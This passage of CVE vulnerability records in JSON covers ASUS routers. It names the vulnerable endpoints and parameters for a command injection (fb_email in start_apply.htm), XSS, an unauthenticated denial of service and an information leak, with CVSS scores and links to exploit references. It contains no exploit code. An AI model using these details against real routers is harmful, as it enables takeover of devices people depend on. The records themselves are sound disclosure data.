              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-acrh12:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "1EF9FF00-2DDC-4900-8A93-A51E41EA5C17",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-acrh13:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "41AF79B6-D208-4357-A08D-D1AB6F136F59",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ax3000:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "1515AF83-732F-489B-A25C-5D67A03A3B25",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ax56u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4D747097-702E-4046-9723-01A586336534",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ax58u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "855509B2-CE29-4A04-B412-C160139EA392",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ax88u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "BB91E047-5AE1-4CA0-9E67-84170D79770C",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ax92u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "8EB70155-390A-472E-A0AA-59A18ADD2BF5",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-g32:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "5AD16BBF-DB02-4E96-A310-82C13898B29D",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n10\\+d1:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8794D4A-5E8C-432D-A2FB-9CF86158E8D5",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n10e:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "9AFCC588-AAA6-45FA-8D1F-E57C7693D27A",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n14u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "85B0C29C-29A5-4659-8D76-9241B13682DF",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n16:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3E016FE0-0A28-49AA-A213-38A5F7728FE2",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n19:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "507A5D4D-CAF9-4417-9EA6-B499E04D1CDD",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n56r:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "14C092D3-14B2-4DBB-8C20-D15F0BA33FA8",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n56u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "534C0C95-9DD2-464C-8776-01B47398FE13",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n600:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "481C7F6F-23A4-4B8B-8E14-44ADFCBE8C58",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n65u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "B5567C97-0AE2-429B-B4D7-1CF501BD2C07",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n66r:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB4466BA-09EB-43F0-9610-6574F10B5810",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n66u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A60BB38-11FC-48C4-B592-29C6C3A6FEAE",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. When processing the /start_apply.htm POST data, there is a command injection issue via shell metacharacters in the fb_email parameter. By using this issue, an attacker can control the router and get shell."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 un problema en ASUSWRT versi\u00f3n 3.0.0.4.384.20308. Al procesar los datos POST del archivo /start_apply.htm, se presenta un problema de inyecci\u00f3n de comandos por medio de metacaracteres de shell en el par\u00e1metro fb_email. Al usar este problema, un atacante puede controlar el enrutador y conseguir la shell."
    }
  ],
  "id": "CVE-2018-20334",
  "lastModified": "2024-11-21T04:01:15.487",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 10.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-03-20T01:15:22.357",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://starlabs.sg/advisories/18-20334/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://starlabs.sg/advisories/18-20334/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2015-03-23 16:59
Modified
2024-11-21 02:27
Severity ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) next_page, (2) group_id, (3) action_script, or (4) flag parameter to start_apply.htm.
Impacted products
Vendor Product Version
asus rt-g32_firmware 2.0.2.6
asus rt-g32_firmware 2.0.3.2
asus rt-g32 -



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:asus:rt-g32_firmware:2.0.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "B21BBA8F-73CB-4C10-8D25-12BA8A8FD4CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:asus:rt-g32_firmware:2.0.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "28B35FF4-75BB-4AE6-B3A7-BB5ABB3AB5B3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:asus:rt-g32:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "5AD16BBF-DB02-4E96-A310-82C13898B29D",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple cross-site scripting (XSS) vulnerabilities in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) next_page, (2) group_id, (3) action_script, or (4) flag parameter to start_apply.htm."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples vulnerabilidades de XSS en los routers ASUS RT-G32 con firmware 2.0.2.6 y 2.0.3.2 permiten a atacantes remotos inyectar secuencias de comandos web arbitrarios o HTML a trav\u00e9s del par\u00e1metro (1) next_page, (2) group_id, (3) action_script, o (4) flag en start_apply.htm."
    }
  ],
  "id": "CVE-2015-2681",
  "lastModified": "2024-11-21T02:27:50.530",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2015-03-23T16:59:09.523",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://packetstormsecurity.com/files/130724/ASUS-RT-G32-Cross-Site-Request-Forgery-Cross-Site-Scripting.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://seclists.org/fulldisclosure/2015/Mar/42"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://websecurity.com.ua/7644/"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/73296"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://packetstormsecurity.com/files/130724/ASUS-RT-G32-Cross-Site-Request-Forgery-Cross-Site-Scripting.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://seclists.org/fulldisclosure/2015/Mar/42"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://websecurity.com.ua/7644/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/73296"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-03-20 01:15
Modified
2024-11-21 04:01
Summary
An issue was discovered in ASUSWRT 3.0.0.4.384.20308. An unauthenticated user can trigger a DoS of the httpd service via the /APP_Installation.asp?= URI.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:asus:asuswrt:3.0.0.4.384.20308:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F4DB439-E9CC-4BA5-9A05-B51BF8DCD038",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:asus:gt-ac2900:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "B581C286-7C47-42BF-8876-243285409374",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:gt-ac5300:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "9D2B9867-7DA3-4221-9148-36FD412FA993",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:gt-ax11000:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC02F598-C10E-4C77-9BE9-CB3660893C5E",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1200:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "9BE19DF1-EB89-4CE5-956F-79BD4AD5E52F",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1200_v2:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "80BBA2CB-3DD3-4A8F-9556-E845AFAB2043",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1200g:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "1CF74439-AD6D-4BBB-9254-640170FE1CF3",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1200ge:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2078161F-17EB-45EE-BCE9-C86B3860FD5C",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1750:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "59001E8D-E835-464A-915A-AAF59F2F397F",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1750_b1:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "51FC355D-5C81-4041-B649-EB271CA55AFD",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1900p:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "F1E5EEF4-D19B-41D1-86B6-F2CBB745570E",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac3100:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "B9B17C2B-A1EC-4FC1-8AB1-F35D9E3A0AA2",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac3200:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "AFE8A3B1-284B-40EC-872E-B8F7103F108C",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac51u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "24748D40-7F43-44DA-BBEF-46D85D2AADA3",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac5300:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "55EE62D6-1E29-4E84-8944-D3D68E212140",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac55u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4C7DF43D-7EEE-405C-BB2B-822936BCB4A0",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac56r:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "E32874C8-05B6-44A1-B118-DC2F4FE62134",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac56s:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "63A1E548-F12D-4BF7-9C01-1325A725FF91",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac56u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "F3E87BA7-FACD-46B2-BE2A-9EFEA3C62C17",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac66r:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4D59C40A-D9BA-455B-9F9E-D3B6FB80BC13",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "1ED39CBC-80ED-4037-9285-4D4CFA45F00E",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac66u-b1:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD103F76-C432-4577-8465-831E0314D8D4",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac66u_b1:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "5F6B0EC4-797D-4059-AA90-EC09A49FE105",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac68p:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "5713F0F3-B616-42B7-A0D8-7983F00E79FE",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac68u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "1E23D00B-76E3-438C-8023-3D7CC6AEEE15",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac86u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "89095282-ABBD-4056-B731-7F05638DB1A6",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac87u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "317B2498-88CE-431F-97E1-EFE7F7E34E05",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac88u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "81008E66-B5E8-4DE5-B14D-E6983C69BC29",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-acrh12:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "1EF9FF00-2DDC-4900-8A93-A51E41EA5C17",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-acrh13:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "41AF79B6-D208-4357-A08D-D1AB6F136F59",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ax3000:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "1515AF83-732F-489B-A25C-5D67A03A3B25",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ax56u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4D747097-702E-4046-9723-01A586336534",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ax58u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "855509B2-CE29-4A04-B412-C160139EA392",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ax88u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "BB91E047-5AE1-4CA0-9E67-84170D79770C",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ax92u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "8EB70155-390A-472E-A0AA-59A18ADD2BF5",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-g32:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "5AD16BBF-DB02-4E96-A310-82C13898B29D",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n10\\+d1:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8794D4A-5E8C-432D-A2FB-9CF86158E8D5",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n10e:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "9AFCC588-AAA6-45FA-8D1F-E57C7693D27A",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n14u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "85B0C29C-29A5-4659-8D76-9241B13682DF",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n16:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3E016FE0-0A28-49AA-A213-38A5F7728FE2",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n19:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "507A5D4D-CAF9-4417-9EA6-B499E04D1CDD",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n56r:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "14C092D3-14B2-4DBB-8C20-D15F0BA33FA8",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n56u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "534C0C95-9DD2-464C-8776-01B47398FE13",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n600:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "481C7F6F-23A4-4B8B-8E14-44ADFCBE8C58",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n65u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "B5567C97-0AE2-429B-B4D7-1CF501BD2C07",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n66r:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB4466BA-09EB-43F0-9610-6574F10B5810",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-n66u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A60BB38-11FC-48C4-B592-29C6C3A6FEAE",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. An unauthenticated user can trigger a DoS of the httpd service via the /APP_Installation.asp?= URI."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 un problema en ASUSWRT versi\u00f3n 3.0.0.4.384.20308. Un usuario no autenticado puede desencadenar una DoS del servicio httpd por medio del URI /APP_Installation.asp?=."
    }
  ],
  "id": "CVE-2018-20335",
  "lastModified": "2024-11-21T04:01:15.650",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 7.8,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-03-20T01:15:22.453",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://starlabs.sg/advisories/18-20335/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://starlabs.sg/advisories/18-20335/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-03-20 01:15
Modified
2024-11-21 04:01
Summary
An issue was discovered in ASUSWRT 3.0.0.4.384.20308. An unauthenticated user can request /update_applist.asp to see if a USB device is attached to the router and if there are apps installed on the router.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:asus:asuswrt:3.0.0.4.384.20308:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F4DB439-E9CC-4BA5-9A05-B51BF8DCD038",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:asus:gt-ac2900:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "B581C286-7C47-42BF-8876-243285409374",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:gt-ac5300:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "9D2B9867-7DA3-4221-9148-36FD412FA993",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:gt-ax11000:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC02F598-C10E-4C77-9BE9-CB3660893C5E",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1200:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "9BE19DF1-EB89-4CE5-956F-79BD4AD5E52F",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1200_v2:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "80BBA2CB-3DD3-4A8F-9556-E845AFAB2043",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1200g:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "1CF74439-AD6D-4BBB-9254-640170FE1CF3",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1200ge:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2078161F-17EB-45EE-BCE9-C86B3860FD5C",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1750:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "59001E8D-E835-464A-915A-AAF59F2F397F",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1750_b1:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "51FC355D-5C81-4041-B649-EB271CA55AFD",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac1900p:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "F1E5EEF4-D19B-41D1-86B6-F2CBB745570E",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac3100:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "B9B17C2B-A1EC-4FC1-8AB1-F35D9E3A0AA2",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac3200:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "AFE8A3B1-284B-40EC-872E-B8F7103F108C",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac51u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "24748D40-7F43-44DA-BBEF-46D85D2AADA3",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac5300:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "55EE62D6-1E29-4E84-8944-D3D68E212140",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac55u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4C7DF43D-7EEE-405C-BB2B-822936BCB4A0",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac56r:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "E32874C8-05B6-44A1-B118-DC2F4FE62134",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac56s:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "63A1E548-F12D-4BF7-9C01-1325A725FF91",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac56u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "F3E87BA7-FACD-46B2-BE2A-9EFEA3C62C17",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac66r:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4D59C40A-D9BA-455B-9F9E-D3B6FB80BC13",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "1ED39CBC-80ED-4037-9285-4D4CFA45F00E",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac66u-b1:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD103F76-C432-4577-8465-831E0314D8D4",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac66u_b1:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "5F6B0EC4-797D-4059-AA90-EC09A49FE105",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac68p:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "5713F0F3-B616-42B7-A0D8-7983F00E79FE",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac68u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "1E23D00B-76E3-438C-8023-3D7CC6AEEE15",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac86u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "89095282-ABBD-4056-B731-7F05638DB1A6",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac87u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "317B2498-88CE-431F-97E1-EFE7F7E34E05",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-ac88u:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "81008E66-B5E8-4DE5-B14D-E6983C69BC29",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-acrh12:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "1EF9FF00-2DDC-4900-8A93-A51E41EA5C17",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:h:asus:rt-acrh13:-:*:*:*:*:*:*:*",
